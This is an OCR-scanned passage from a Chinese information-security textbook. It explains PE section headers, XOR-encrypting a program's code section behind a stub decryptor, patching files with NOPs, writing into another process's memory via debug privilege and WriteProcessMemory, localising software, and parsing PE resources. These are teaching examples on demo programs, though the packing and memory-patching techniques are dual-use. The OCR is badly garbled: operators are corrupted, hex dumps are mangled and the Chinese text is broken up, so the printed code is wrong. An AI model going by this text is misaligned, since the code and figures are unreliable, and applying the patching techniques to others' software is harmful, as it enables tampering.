ULONG VirtualAddress :入 内 存 后 节 区 的 RVA 地 址 


ULONG SizeOfRawData : 节 在 文件 中 对 齐 后 字 节 长 度 
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ULONG  PointerToRawData : 节 基 于 文件 的 偏 移 量 
ULONG  PointerToRelocations 

ULONG  PointerToLinenumbers 

USHORT NumberOfRelocations 

USHORT NumberOfLinenumbers 


ULONG Characteristics : 节 的 属性 
) 

重要 字段 介绍 如 下 : 

e Name 为 节 的 名 称 。 节 名 仅仅 是 个 标记 而 已 ， 可 以 选择 任何 名 字 甚 至 空 着 也 行 ， 也 
不 用 null 结尾 。 通 常 编译 器 将 代码 节 设 置 为 “.text” 或 “.code”， 可 读 写 的 数据 
节 设 置 为 “.data”， 包 含 只 读数 据 ， 资 源 节 为 “rsrc”。 

e VirtualAddress 为 本 节 的 相对 虚拟 地 址 RVA。 例 如 ， 如 果 其 值 是 1000h， 而 PE 文 
件 装 在 地 址 400000h 处 , 那么 本 节 就 被 装载 到 401000h 开始 的 逻辑 空间 , 如 图 2-22 
所 示 。 

e° SizeOfRawData 为 经 过 文件 对 齐 处 理 后 节 尺寸 。 假 设 一 个 文件 的 文件 对 齐 粒度 是 
200h, 而 该 节 的 VirtualSize 指示 本 节 的 实际 长 度 是 388h 字 节 , 则 本 字段 值 为 400h， 
表示 本 节 是 400h 字 节 。 

* PointerToRawData 为 节 基于 文件 的 偏 移 量 ，PE 装载 器 通过 本 域 值 找到 节 数 据 在 文 
件 中 的 位 置 。 

e Characteristics 为 包含 标记 以 指示 节 属 性 ， 比 如 节 是 否 含有 可 执行 代码 、 初 始 化 数 
据 、 未 初始 数据 ， 是 否 可 写 、 可 读 等 。 

BAX: : \MASM32\EXAMFLE 1 \SDFRAMES\SDFRAMES. EXE ¿hr IF 

a 1 Doss 
mes .text ctae 
SHE iHa 

节 的 实际 大 小 =9dCh Sek ud 
84 = 

节 的 名 字 25055 在 文件 中 

28 Ss] 
节 的 实际 大 小 =492h 

857 属性 mi 

图 2-22 PE 文件 分 析 
2. 加 密 过 程 


(1) 分 析 被 加 密 程 序 的 结构 ， 如 图 2-23 所 示 。 
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টো 
入口 地 址 RVA=17E0h 


POTR an 
蔬 的 文件 =1000h 


=1000h 


图 2-23 ”被 加 密 程序 结构 


Q) 由 第 一 节 代码 节 可 知 ， 选 择 程序 中 未 用 的 空间 来 放 加 密 数 据 。 到 需要 加 密 的 地 方 
选择 一 块 没有 利用 上 的 空间 ， 如 选择 001b00h， 如 图 2-24 所 示 。 
Q) 编写 加 密 代码 程序 casm， 生 成 c.exe。 


.386 

model flat,stdcall 

option casemap:none 

WinMain proto -DWORD.:DWORD.:DWORD.:DWORD 

include wmasm32 include Wwindows.inc 

include wmasm32 include kernel32 inc 

includelib wmasm32 lib kernel32.lib 

.data 

„code 

start: 
db Ob00h dup(90h) :文件 头 占 了 1000h 5715 
mov esi, 00401000h :起 始 地 址 
mov ecx, 0b00h 

Nextl:xor byte ptr[esi]. 78h 
inc esi 
loop Nextl 
db 0৩9 : 跳 转 jmp 的 机 器 码 
dd 00400010h :后 面 再 改 成 具体 跨度 
invoke ExitProcess.eax 
end start 


这 是 用 masm32 来 生成 exe 的 。 
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001ac80 00 99 00 00 99 OG 99 O0 HG 99 O0 00 99 99 O0 99 


m 


081598 ৪৪ 8i 00 00 80 00 08 ৪৪ 88 ৪৪ 00 00 00 08 


eras “in Ed A001b003F42 ' 
001bb0 || 
001bcÓ uu UU UU UU UU UU UU UU UU UU UU UU UU UU UU UU 


图 2-24 找到 放 加 密 代码 的 位 置 
反 汇 编 cexe， 可 以 看 到 如 图 2-25 所 示 的 代码 。 


0 


225 加 密 代码 


要 把 jmp 004017E3h 修改 为 jmp 004017E0h 原 程序 起 始 地 址 。 计 算 跨 度 : 004017E0h - 
00401B15h = OFFFFFCCBH。 修 改 如 图 2-26 所 示 。 
== === IRD Eg IAD ED HOW 
১৪৪1: s e |= c mim e দা 
ER 
000d00 BE 00 10 50 00 B9 00 OB 8 36 42 46 E2 FA 

10 [E9 19 00 n0 o0] 


800420 40 OG 60 O|! 
000d30 00 00 6 


o ea 修改 前 后 10 mno 


A- i- o wa | 52 v BINS uw 


999৫99 BE 00 10 4O 00 B9 00 OB 99 36 42 86 E2 FA 
900018 

000420 ^0 00 
000d130 00 00 99 00 00 99 99 OG 99 


226 ”修改 跳 转 地 址 


为 了 检查 修改 是 否 合适 ， 反 汇编 ,如 图 2-27 所 示 。 可 以 看 到 ， 正 好 跳 转 到 原来 的 入 口 
地 址 ， 表 明 修 改正 确 。 
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图 2-27 检查 修改 情况 


再 打开 有 加 密 代码 的 程序 c.exe， 将 加 密 代码 复制 到 testexe 的 1b00h 位 置 ， 如 图 2-28 
Wiz. 


00 00 00 60 9৪9 
001b30 99 00 00 08 
001bs0 600 00 00 08 
991b59 600 00 00 08 660 


图 2-28 复制 加 密 代码 


(4) 编写 加 密 代码 。 

前 面 的 过 程 实际 上 是 添加 解密 代码 的 过 程 ， 下 面 的 代码 才 是 加 密 过 程 。 
首先 要 修改 加 入 了 解密 代码 程序 的 结构 ， 编 程 修改 如 下 字段 : 

e IMAGE OPTIONAL HEADER: 

৫) AddressEntryPoint 入 口 地址 改 为 401b00h， 相 对 基本 地 址 为 1b00h 
@) SizeOfCode 修改 为 第 1 节 长 度 1000h 

e MAGE SECTION HEADER: 

(D VirtualSize: 节 区 的 实际 长 度 修改 为 第 1 节 的 整个 长 度 1000 

© 节 的 属性 修改 为 可 读 可 写 可 执行 : 或 40000000h+80000000h 

节 的 属性 如 图 2-29 所 示 。 


= 丢弃 (如 重 定位 .reloc) 
হী 


40000000) in. 
BEE 映射 到 内 存 ， 


'8000000H, 
0000000H, 数 E PE 


229 MNRE 


(5) 修改 程序 结构 和 编写 加 密 代码 
// 包 括 入 口 地 址 、 节 的 实际 大 小 、 节 的 属性 、 代 码 部 分 大 小 、 节 的 加 密 
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void CMyDlg::OnButtonl () 
t 
CFile fp. fp2: 
CString m Efile; 
wchar tszFilter[] = 工 "选择 exel*.exe| 选 择 dll* dll"; 
CFileDialog file(TRUE.NULL.NULL.NUL L,szFilter.this): 
file.DoModal(): 
m Efile-file.GetPathName(): 
UpdateData(FALSE): 
if(m Efile——"")( 

AfxMessageBox(L "无 可 执行 文件 名 "7): 

Tetum:} 
fp.Open(m Efile.CFile::modeRead): 
fp2.Open(L"C:\\new.exe",CFile::modeCreate|CFile::modeWrite); 
int len=fp.GetLengthO; 
//fp2.SetLength(len); 

IMAGE DOS HEADER *pdos header; 
IMAGE NT HEADERS *pnt header: 
IMAGE SECTION HEADER  *psection header: 
BYTE *ptr-new BYTE[len]: 
fp.Read(ptr.len): 
/修改 结构 
pdos_header=(IMAGE DOS HEADER*)ptr: 
pnt header-(IMAGE NT HEADERS*)(ptr*pdos header->e lfanew); 
psection header-(IMAGE SECTION HEADER*)(ptr*pdos header-»e lfanew-- 
sizeoflMAGE NT HEADERS)): 
pnt header-^OptionalHeader.AddressOfEntryPoint-0x1b00; 
pnt header-^OptionalHeader.SizeOfCode-0x 1000; 
psection header-»Characteristics|-0xC0000000: 
psection header-^Misc.VirtualSize-0x 1000: 
HUME 
for(int i-0x1000:i-0x 1b00:i-—)ptr[i]^—0x78: 
fp2. Write(ptr.len): 
1p2.CloseQ: ) 
(6) 对 比 加 密 前 后 文件 的 反 汇编 情况 
加 密 前 反 汇 编 可 以 看 到 调用 的 函数 ， 加 密 后 则 看 不 到 。 加 密 前 为 明码 ， 加 密 后 代码 章 
分 为 密码 。 


29 软件 补丁 


软件 补丁 常常 是 因为 发 现 了 软件 的 小 错误 ， 而 为 了 修复 个 别 小 错误 而 推出 ; 或 者 为 了 
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增强 某 个 小 功能 而 发 布 ， 也 有 的 是 为 了 增强 文件 抵抗 计算 机 病毒 感染 而 发 布 ， 如 微软 的 
Office 为 了 抵抗 宏 病毒 而 打 补 丁 。 

在 日 常 的 计算 机 使 用 过 程 中 ， 用 户 最 多 的 就 是 直接 跟 软 件 打交道 ， 有 时 可 能 会 发 现 软 
件 有 Bug。 如 果 不 及 时 为 软件 打上 补丁 ， 可 能 会 导致 数据 丢失 ， 那 就 得 不 偿 失 了 。 打 补丁 
的 方法 有 两 种 : 一 种 是 修改 文件 ， 另 一 种 是 修改 程序 的 内 存 数 据 。 


2.9.1 文件 补丁 


修改 文件 中 的 代码 或 数据 。 先 反 汇 编 ， 找 到 代码 或 数据 所 在 的 内 存 位 置 ， 然 后 计算 出 
它 在 文件 中 的 位 置 ， 最 后 将 新 的 代码 或 数据 写 入 即 可 。 

将 代码 或 数据 所 在 的 内 存 位 置换 算 成 文件 偏 移 地 址 的 算法 是 : 内 存 虚拟 地 址 减 去 虚拟 
基地 址 ， 减 去 所 在 节 的 虚拟 偏 移 地 址 ， 再 加 该 节 的 文件 偏 移 地 址 。 例 如 下 面 的 例子 ， 程 序 
原 界面 如 图 2-30 所 示 。 单 击 打开 文件 按钮 ， 会 先 弹出 一 个 信息 框 ， 现 在 要 把 它 去 掉 。 


图 2-30 补丁 前 界面 


用 W32Dasm 反 汇 编 该 文件 ， 找 到 代码 处 ， 如 图 2-31 所 示 。 如 果 将 图 中 夯 圈 部 分 修改 
为 0x9090， 程 序 运 行 时 就 会 跳 过 信息 框 。 

该 行 的 内 存 偏 移 为 0x004011F1， 减 去 基地 址 0x400000， 得 到 相对 偏 移 地 址 0x11F1， 
而 第 1 节 的 相对 偏 移 从 图 2-32 可 看 出 为 从 0x1000~0x1FFF， 因 此 需要 修改 的 代码 位 于 第 1 
节 。0x11F1 减 去 该 节 开 始 相对 偏 移 0x1000， 得 到 0x1F1， 而 该 节 的 文件 为 移 为 0x400， 所 
以 需要 修改 的 代码 的 文件 偏 移 为 0x400+0x1F1。 


图 2-31 反 汇 编 结果 
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PER: :. text E 1A8H DOs 头 分 析 
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图 2-32 HRA 


那么 ， 修 改 文件 的 代码 如 下 ， 程 序 运行 如 图 2-33 所 示 。 


void CFilePatchDlg::OnBFilePatch() 
{ 
CFile fp: 
if(!fp.Open("C:\\COMCTLS.exe",CFile::modeReadWrite)) retum; 
IMAGE DOS HEADER dos header; /PE ftJ DOS 头 
IMAGE NT HEADERS nt header; /PE 的 PE 头 
IMAGE SECTION HEADER section header; // 节 表 
fp. Read(&dos header, sizeof(dos header)): 
fp. Seek(dos header.e lfanew, CFile::begin): 
fp.Read(&nt header, sizeof(nt header)): 
fp.Read(&section header, sizeof(section header)): 
WORD data-0x9090: 。 ”// 要 写 入 的 补丁 数据 
int len=m_Eaddress.GetLengthO: 
m Eaddress.MakeUpper(: 
DWORD pos=0: //Cstring 类 型 控件 m Eaddress 中 为 字符 串 表示 的 16 进 制 虚拟 地 址 
/将 其 转换 为 数据 
for(int val=len-1:val>=0:val--) ( 
if(((char*)m Eaddress.GetBuffer(0))[val]-—(char)'9") 
pos+=((DWORD)((char*)m Eaddress.GetBuffer(0)[val]-0x30)-«((len-val-1)*4)): 
else 
pos--(DWORD)(char*)m Eaddress, GetBuffer(0)[val]-0x41--10)-«((len-val-1)*4)): 
) 
DWORD base-pos-nt header.OptionalHeade.ImageBase: /虚拟 地 址 -虚拟 基本 地 址 
base 一 section _ header.VirtualAddress: // 减 去 节 虚 拟 偏 移 地 址 
base+=section_header.PointerToRawData: 。“// 加 节 文 件 偏 移 地 址 
fp.Seek(base, CFile::begin): 
fp. Write(&data, 2): 
fp.Close0: 
) 
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图 2.33 写 文件 补 本 


执行 程序 COMCTLS.exe， 发 现 信 息 框 没有 了 。 可 以 反 汇编 看 代码 的 变化 ， 也 可 以 用 
VC++ 以 二 进 制 方式 打开 文件 ， 看 文件 偏 移 0x400+0x1F1 处 的 变化 。 


292 内存 补 丁 


指 修改 进程 内 存 中 的 代码 或 数据 。 写 内 存 的 过 程 为 : 获取 进程 的 ID( 用 函数 
EnumProcesses，EnumProcessModules，GetModuleFileNameEx)， 然 后 判断 当前 的 操作 系统 
(调用 函数 GetVersionEx)， 如 果 是 Windows NT、2000 或 XP 则 先 提升 本 进程 权限 (打开 服务 
进程 需要 该 步 ,调用 函数 OpenProcessToken、LookupPrivilegeValue 和 AdjustTokenPrivileges), 
然后 打开 进程 (用 函数 OpenProcess 以 PROCESS ALL ACCESS 方式 打开 进程 ， 调 用 
WriteProcessMemory 向 进程 虚拟 地 址 写 数据 ， 调 用 CloseHandle 关闭 进程 )。 以 下 面 的 程 
序 为 例 ， 如 图 2-34 所 示 的 按钮 ， 单 击 后 会 显示 一 个 提示 对 话 框 。 这 里 通过 修改 内 存 数据 去 
掉 它 。 


234 ”修改 内 存 数据 


反 汇 编 后 如 图 2-35 所 示 ， 程 序 运行 后 ， 用 0x90( 即 nop 指令 ) 把 显示 MessageBox 指令 
填 掉 。 请 注意 看 下 面 程序 的 WriteProcessMemory: 


2335 寻找 内 存 位 置 
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void CDoProcessDlg::OnBWriteMem() 
{ 
char path[256].pID[18].based[20]: 
POSITION pos =m ICtrl.GetFirstSelectedItemPosition(): 
ifpos—NULL)( 
AfxMessageBox(" 请 选择 进程 1"); 
return: 
) 
int m nIndex = m ICtrl.GetNextSelecteditem(pos); / 得 到 项 目 索引 
m ICtrl.GetltemText(m nIndex, 2, path, 256 ): 
m ICtrl.GetItemText(m nIndex, 1, pID, 18 ): 
m ICtrl.GetItemText(m nIndex, 3, based, 20 ): 
CString sbase-based: 
if(sbase—"unknown")( 
AfxMessageBox(" 超 级 进程 .无 法 读 !"); 
return: 
) 
DWORD processID=(DWORD)atoi((char*)pID): 
HANDLE hprocess=NULL.hProcessToken=NULL: 
OSVERSIONINFO ver: 
Ver.dwOSVersionInfoSize=sizeoflvenD:/ 必 须 的 ， 否 则 不 正确 
if('GetVersionEx(&ver)) ( 
zEnableWindow(m Scan.m hWnd.TRUE): 
AfxMessageBox(" 无 法 判断 当前 操作 系统 "); 
return: ) 


if(ver.dwPlatformld==VER PLATFORM WIN32 NT)( //7j NT.2000.XP 
if('OpenProcessToken(GetCurrentProcess(). TOKEN ALL ACCESS,&hProcessToken)) 
{ 
:zEnableWindow(m Scan.m hWnd.TRUE): 
AfxMessageBox(" 打 开本 进程 访问 令 牌 失败 1"); 
return; 
) 
if(!SetPrivilege(hProcessToken.SE DEBUG NAME.TRUE)) 
t 
zEnableWindow(m Scan.m hWnd, TRUE); 
Af&MessageBox(" i EUBUB firi"): 
return; 
) 
) 
这 (hprocess=OpenProcess(PROCESS_ALL ACCESS.FALSE.processID))—NULL) 
{ /打开 进程 失败 
return; 
) 
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BOOL re=FALSE; 
DWORD base-0x400000: 
这 sbase 一 "400000")base=0x400000: 
这 sbase 一 "1000000")base=0x1000000: 
CString in: 
int len=m Eaddress.GetLength(): 
m Eaddress.MakeUpper(): 
BYTE pdata[20]; 
for(int n1-0; n1-20; n1-—)pdata[n1]-0x90; 
base-0x4012F0; 
re-WriteProcessMemory(hprocess,(LPVOID)base,pdata,20, NULL); 
if(re—FALSE)( 
AfxMessageBox(" 写 内 存 失败 "); 
return: 
) 
if(hprocess)CloseHandle(hprocess): 
) 


黑体 字 部 分 ， 把 虚拟 地 址 0x4012F0 开始 的 20 个 字 节 用 0590 覆盖 。 因 此 再 单 击 按钮 


时 ， 就 看 不 到 提示 对 话 框 了 。 修 改过 程 如 图 2-36 所 示 。 完 整 的 程序 见 “ 扫 描 内 存 与 内 存 数 
据 读 写 ”和 “内 存 补丁 演示 ”。 


7, 内 存 补丁 演示 


e: Xdocs ENPRE] SA 338. 
C:\Program Files\Wicrosoft Visual Studio 9. 0XCommon7 IDEM. . . 
॥ 


e 100... 
C: 100... 
o GREIE D … 400000 


2-36 ”修改 程序 内 存 数据 


2.10 软件 的 汉化 


软件 的 汉化 就 是 将 一 个 外 文 版 的 软件 ( 绝 大 部 分 是 英文 版 ) 经 过 一 系列 技术 处 理 后 ， 使 
操作 界面 (如 菜单 、 对 话 框 、 提 示 、 帮 助 等 ) 的 提示 语言 变 成 了 中 文 ， 而 程序 内 核 和 功能 保 
FASE, 

常用 的 汉化 工具 有 : UltraEdit 5.0， 以 后 的 版 本 不 行 ， 用 于 对 EXE 文件 进行 HEX 方式 


第 2 章 软件 安全 “53 


修改 和 汉化 后 期 的 修补 ， 主 要 针对 于 普通 的 字符 串 ，eXeScope， 用 于 修改 软件 的 对 话 框 、 
菜单 等 ，SeaTools， 中 国 软件 汉化 同盟 内 部 设计 的 工具 ，Patch 1.02， 中 国 软件 汉化 同盟 内 


部 开发 工具 


， 用 于 制作 补丁 包 ， 当 一 个 软件 汉化 完毕 后 ,使 用 它 生 成 汉化 补丁 ， 用 于 发 布 。 


常见 的 软件 汉化 方法 有 : 


0) 使 


自动 化 工具 进行 汉化 ， 如 CPATCH、 东 方 快车 的 永久 汉化 等 。 


优点 : 
缺点 : 
Q) 使 
优点 : 
缺点 : 
G) 使 


快捷 ， 傻 瓜 式 。 适 用 于 任何 初学 者 。 
翻译 得 不 贴切 ， 界 面 无 法 达到 理想 要 求 。 
用 手工 化 工具 进行 汉化 ， 如 eXeScope 等 。 
汉化 得 很 完美 。 

慢 ， 且 对 汉化 人 员 有 一 定 技术 要 求 。 

用 自动 与 手工 合作 的 方法 汉化 : 


CD 先 用 VC++ 将 EXE 文件 以 资源 的 方式 打开 后 存 为 .RC 文件 ， 然 后 再 用 SeaTools 制 


作成 新 版 的 


资源 文件 后 ， 再 用 VC 填 回 EXE 中 。 


© 使 用 UltraEdit 5.0. eXeScope 将 VC 找 不 到 的 字符 串 和 内 容 进行 替换 。 
@ 使 用 PATCH 制作 汉化 补丁 。 


优点 : 
缺点 : 


最 完善 ， 最 扎实 ， 最 理想 。 
对 系统 的 要 求 多 ， 还 要 要 求 操作 者 能 熟练 儿 种 工具 软件 的 使 用 。 


2.10.1 汉化 演练 
在 对 软件 汉化 前 ， 应 对 此 英文 软件 有 相当 的 了 解 ， 并 且 手头 应 有 一 些 英汉 翻译 书籍 或 


软件 ， 比 如 


金山 词霸 。 先 将 英文 菜单 、 说 明 等 资料 翻译 成 为 中 文 。 


对 英文 软件 中 的 英文 菜单 、 选 项 和 说 明 资料 等 资源 进行 抽取 。 大 多 英文 软件 的 英文 资 


源 都 存放 在 
化 前 软件 运 
的 菜单 ， 如 


扩展 名 为 .EXE 和 .dll 的 文件 中 。 抽 取 相 关 资 源 可 以 用 汉化 软件 如 eXeScope。 汉 
行 界面 如 图 2-37 所 示 ( 汉 化 后 运行 如 图 2-38 所 示 )， 用 eXeScope 打开 后 找到 它 
图 2-39 所 示 。 


চু - Benu 
Eile Edit View Help 


Recent File 


Exit 


2-37 汉化 前 


ts 信息 安全 应 用 教程 


图 2-38 汉化 后 运行 
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图 2-39 打开 待 汉 化 文件 


用 汉化 软件 把 抽取 到 的 英文 资源 存 为 一 个 文本 文件 , 编辑 此 文件 , 编译 格式 如 将 &File 
修改 为 : 文件 (&F)。 操 作 过 程 如 图 2-40 所 示 。 保 存 并 关闭 文件 ， 则 完成 了 汉化 操作 。 
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2.10.2 ”汉化 原理 


汉化 其 实 就 是 将 资源 中 的 相关 字符 由 外 文 变换 为 中 文 。 首 先 要 定位 资源 在 PE 文件 中 
的 位 置 ， 然 后 将 相关 部 分 提取 出 来 。 


1. PE 文件 中 的 资源 


程序 所 用 到 的 各 种 资源 ， 比 如 位 图 、 和 鼠标 、 菜 单 和 对 话 框 等 都 存在 PE 文件 中 的 某 个 
节 中 ， 一 般 称 之 为 资源 节 ， 很 多 编译 器 将 之 命名 为 “rsrc”。 要 准确 定位 资源 节 的 位 置 ， 
在 PE 头 结构 IMAGE DATA DIRECTORY 数组 第 3 项 的 字段 VirtualAddress 为 资源 段 的 
开始 RVA，iSize 为 字 节 大 小 。 

有 很 多 描述 资源 结构 的 图 片 ， 层 次 都 不 是 很 清晰 。 通 过 如 图 2-41 和 2-42 所 示 则 能 方 
便 地 看 出 各 层次 和 准确 定位 资源 数据 与 指针 。 本 节 介 绍 的 结构 在 WINNT.H 中 定义 。 

在 深入 分 析 前 ， 首 先 要 介绍 将 PE 文件 在 内 存 中 的 虚拟 地 址 到 文件 偏 移 地 址 的 转换 方 
法 。 设 已 知 某 内 存 相对 地 址 值 为 rva、 节 表 结 构 指针 addr 和 节 的 个 数 为 sec。 原 理 是 遍历 每 
个 节 ， 如 果 rva 大 于 等 于 该 节 的 起 始 地 址 VirtualAddress 和 小 于 VirtualAddress 加 该 节 在 磁 
盘 中 占用 的 空间 长 度 PointerToRawData， 则 说 明 rva 值 在 该 节 内 。 而 文件 偏 移 值 则 等 于 该 
节 的 文件 偏 移 PointerToRawData 加 上 rva， 再 减 去 该 节 起 始 虚 拟 地 址 VirtualAddress。 代 码 
如 F: 

DWORD CMyDlg::RVAtoFileOffset(DWORD rva, IMAGE SECTION HEADER* addr.int 
sec,DWORD SectionAlignment) 
/出 口 参数 文件 偏 移 什 
for(int i=0;i<sec;i++){ 
iftrva>=adar[i] VirtualAddress&& 
rva<=addr[i] VirtualAddress--addr[i].SizeOfRawData) 
ptr=addr[i].PointerToRawData+rva-addr[i].VirtualAddress: 


return ptr; 


DWORD ptr-0: 


2. 定位 资源 数据 位 置 与 大 小 


(1) 通过 DOS Header 结构 的 字段 e lfanew， 定 位 PE Header 在 文件 中 的 位 置 。 

(2) 根据 FileHeader 中 的 字段 NumberOfSections 值 ， 确定 文件 中 节 的 数目 ， 也 就 是 节 
表 数 组 中 元 素 的 个 数 。 

(3) 取得 PE Header 的 Optional Header 中 的 DataDirectory 数组 中 的 第 三 项 ， 也 就 是 资 
源 项 。DataDirectory[] 数 组 的 每 项 都 是 IMAGE DATA DIRECTORY 结构 ， 该 结构 定义 
如 下 : 
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typedef struct IMAGE DATA DIRECTORY { 


DWORD VirtualAddress; 
DWORD Size; 
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} IMAGE DATA DIRECTORY, *PIMAGE DATA DIRECTORY: 


数组 第 三 项 中 的 成 员 VirtualAddress 的 值 就 是 在 内 存 中 资源 节 的 RVA， 指 向 资源 结构 
第 一 层 。 图 2-41 和 图 2-42 描述 了 资源 在 程序 中 的 结构 。 


VirtualAddress 
IMACE DATA DIRBCTORY[2] ... 
iSize ) 


GRUB a 


ESOURCE_DIRECTOTY | - 
WasberofllaneEntrtes = n (PLORA E s) 


> 此 层 的 Rame 为 资源 类 型 
RT_CURSOR 
RT_BITMAP 


mip EERDE 

(ENTRY - ঠা inni 

1 资源 节 偏 移 (VirtualAddress- 
得 到 下 个 结构 的 RVA 


NuberOfNaneBntries = k 
NuiberofIcEntries 


i (P 1 字符 串 名 资源 
1 去 高 位 + 该 源 节 RVA 
一 ?UNICODE 字 符 册 
ipsi 0, 为 ID 命名 资源 


图 2-41 资源 结构 


3. 资源 节 中 的 资源 组 织 结构 
共 分 4 层 ， 到 最 后 一 层 才 指向 资源 的 数据 。 


(REBAS) 
F TMAGE RESOURCE DIRBCTOTY | 


psj 
{ [2৬5 TRECTORY ENTRY i 
L offsetTopata _ _ 


的 ae 为 语言 代码 页 ) 
:中 文 为 5804, 英文 406 


IMACE RESOURCE DATA ENTRY 
9 RERNU 


OffzetToData 资源 致 据 RYA 
Sise HANEKE 


图 2-42 资源 结构 


0) 第 一 层 : 将 资源 以 类 型 方式 描述 。 首 先是 结构 IMAGE RESOURCE DIRECTORY, 


定义 如 下 。 


typedef struct_ IMAGE RESOURCE DIRECTORY ( 


DWORD Characteristics: 
DWORD TimeDateStamp: 
WORD MajorVersion: 

WORD MinorVersion: 

WORD NumberOfNamedEntries: 
WORD NumberOfldEntries: 
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) IMAGE RESOURCE DIRECTORY; 


NumberOfNamedEntries 5; NumberOfldEntries 之 和 用 来 表示 紧 跟 在 后 面 的 结构 
IMAGE 。 
RESOURCE DIRECTORY ENTRY 项 的 个 数 。 其 他 字段 不 重要 。 该 结构 的 字段 在 不 
同 层 意义 不 同 ， 为 了 简化 说 明 ， 本 文 用 Name 和 OffsetToData 描述 。 
typedef struct IMAGE RESOURCE DIRECTORY ENTRY í 
DWORD Name; 


DWORD Of 人 etToData: 
}IMAGE RESOURCE DIRECTORY ENTRY; 


此 层 中 Name 为 资源 的 类 型 ， 有 以 下 几 种 ; 


RT ACCELERATOR // Accelerator table 

RT ANICURSOR //Animated cursor 

RT ANIICON //Animated icon 

RT BITMAP /Bitmap resource 

RT CURSOR //Hardware-dependent cursor resource 
RT DIALOG //Dialog box 

RT FONT //Font resource 

RT FONTDIR //Font directory resource 


RT GROUP CURSOR 
RT GROUP ICON 


//Hardware-independent cursor resource 
//Hardware-independent icon resource 


RT HTML HTML //document 

RT ICON //Hardware-dependent icon resource 

RT MENU //Menu resource 

RT MESSAGETABLE //Message-table entry 

RT PLUGPLAY /Plug and play resource 

RT RCDATA //Application-defined resource (raw data) 
RT STRING //String-table entry 

RT VERSION //Nersion resource 

RT VXD INXD 


还 可 以 自 定义 资源 。 

OffsetToData 去 掉 高 位 后 就 是 下 层 结构 相对 于 资源 节 的 偏 移 值 ， 因 此 计算 下 层 结构 
RVA 时 要 OffsetToData 与 OX7FFFFFFF 再 加 资源 节 RVA， 再 转换 为 文件 偏 移 。 该 字段 使 
得 用 户 可 以 定位 第 二 层 。 

(2) 第 二 层 : 将 资源 以 ID 或 名 称 方式 描述 。 首 先是 结构 IMAGE_RESOURCE_ 
DIRECTORY， 然 后 用 NumberOfNamedEntries 与 NumberOfldEntries 之 和 来 表示 紧 跟 在 后 
面 的 结构 IMAGE RESOURCE DIRECTORY ENTRY 项 的 个 数 。NumberOfNamedEntries 
为 以 字符 串 方式 命名 的 资源 项 的 个 数 , NumberOfldEntries 为 以 ID 值 (整数 ) 命 名 的 资源 项 的 
个 数 。 后面 的 结构 IMAGE RESOURCE DIRECTORY ENTRY 数组 中 字段 与 第 一 层 不 同 。 
如 果 Name 的 高 位 为 1， 表 示 以 字符 串 方式 命名 ， 去 掉 高 位 后 与 资源 节 RVA 相 加 ， 就 是 以 
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UNICODE 格式 保存 字符 串 的 资源 名 的 RVA。 

此 层 的 OffsetToData 去 掉 高 位 ， 与 资源 节 RVA 相 加 后 ， 得 到 下 层 结构 的 RVA， 即 语 
言 页 层 。 

(3) 第 三 层 : 将 资源 以 语言 页 方式 描述 。 HIGHAM IMAGE RESOURCE DIRECTORY, 
然后 用 NumberOfNamedEntries 与 NumberOfIdEntries 之 和 来 表示 紧 跟 在 后 面 的 结构 
IMAGE RESOURCE DIRECTORY ENTRY 项 的 个 数 ,IMAGE_RESOURCE_DIRECTORY_ 
ENTRY 中 字段 Name 为 资源 的 语言 页 , 例如 中 文 简体 为 804h。OffsetToData 则 指向 下 层 结 
构 ， 计 算 时 仍 要 去 高 位 并 与 资源 节 RVA 相 加 ， 才 是 指向 下 层 的 RVA， 即 资源 数据 层 。 

(4) 第 四 层 : 描述 资源 数据 的 RVA 和 大 小 。 用 结构 IMAGE RESOURCE DATA ENTRY 
描述 。 该 结构 定义 如 下 : 

typedefstruct IMAGE RESOURCE DATA ENTRY { 

DWORD 01৩17019819; 

DWORD Size; 

DWORD CodePage: 

DWORD Reserved; 

) IMAGE RESOURCE DATA ENTRY: 

字段 OffsetToData 即 资源 数据 的 RVA, 直接 用 它 转换 为 文件 偏 移 。Size 为 该 项 资源 数 

据 的 大 小 ， 以 字 节 为 单位 。 


4. 分 析 代码 编写 
以 上 面 的 分 析 为 依据 ， 编 写 一 个 PE 资源 分 析 程 序 。 主 程序 中 定义 如 下 全 局 变量 : 
IMAGE DOS HEADER dos header: /[DOS 3l. 
IMAGE NT HEADERS nt header: /PE 头 
IMAGE SECTION HEADER  *psection header; // 节 表 指针 
CFile fp: /文件 类 对 象 
DWORD SRCrva; /资源 节 虚 拟 地 址 
int rscSection: /描述 资源 所 在 节 的 序号 
CListBox m list; // 放 分 析 结果 
Cstring m Efile; /被 操作 PE 文件 名 


还 定义 了 如 下 3 个 函数 : 
/获取 资源 节 的 RVA， 该 函数 也 许多 余 
DWORD InWhichSection(DWORD rva, IMAGE SECTION HEADER addr,int sec): 
URVA 到 文件 偏 移 的 转换 
DWORD RVAtoFileOffset(DWORD rva, IMAGE SECTION HEADER* addrint sec.DWORD 
SectionAlignment): 
/选择 和 操作 文件 
afx msg void OnBSelect(): 
OnBSelect0 代 码 如 下 。 
void CMyDlg::OnBSelect() 
t 


DER): 
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m list.ResetContent(): 
m ICtrl.DeleteAllItems(): 
CString inf; 
char szFilter[] = "选择 exe|*.exe| 选 择 dll|* dil"; 
CFileDialog file(TRUE.NULL.NULL.NULL.szFilter.this): 
file.DoModal(): 
m Efile-file.GetPathName(): 
UpdateData(FALSE): 
if(m Efile—"")( 
mlist.AddString(" 无 可 执行 文件 名 "): 
Teturn:) 
if(!fp.Open(m Efile.CFile::modeRead)) ( 
m list.AddString(" 不 可 对 其 读 "): 
fp.Close(): 
return; 
) 
fp.Read(&dos header.sizeof(dos header)): 
if(dos header.e magic!-0x5A4D)( 
m list AddString("J5 MZ 标志 "); 
fp.Close(): 
return; 
) 
fh.Seek(dos header.e Ifanew.CFile::begin); 
fp.Read(&nt header.sizeof(nt header)): 
if(nt header.Signature!-0x00004550) ( 
m list. AddString(" JE PE 标志 "); 
fp.Close(): 
return; 
) 
psection header-new IMAGE SECTION HEADER 
[nt header.FileHeader.NumberOfsSections]: 
fp.Read(psection header.nt header.FileHeader.NumberOfSections*sizeofIMAGE SECTION HEA 


DWORD fileOffset-0: 
/从 资源 的 RVA 取得 其 文件 偏 移 地 址 
fileOffset=RVAtoFileOffset(nt_header.OptionalHeader.DataDirectory[2] VirtualAddress, 
psection header.(int)nt header.FileHeader.NumberOfSections, 
nt header.OptionalHeader.SectionAlignment); 
if(fileOffset—0)( 

m_list.AddString(" 地 址 转换 错误 "); 

外 .Close0: 

retum: 
} 
/计算 资源 节 首 地 址 RVA 
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SRCrva-InWhichSection(nt header.OptionalHeader DataDirectory[2].VirtualAddress. 

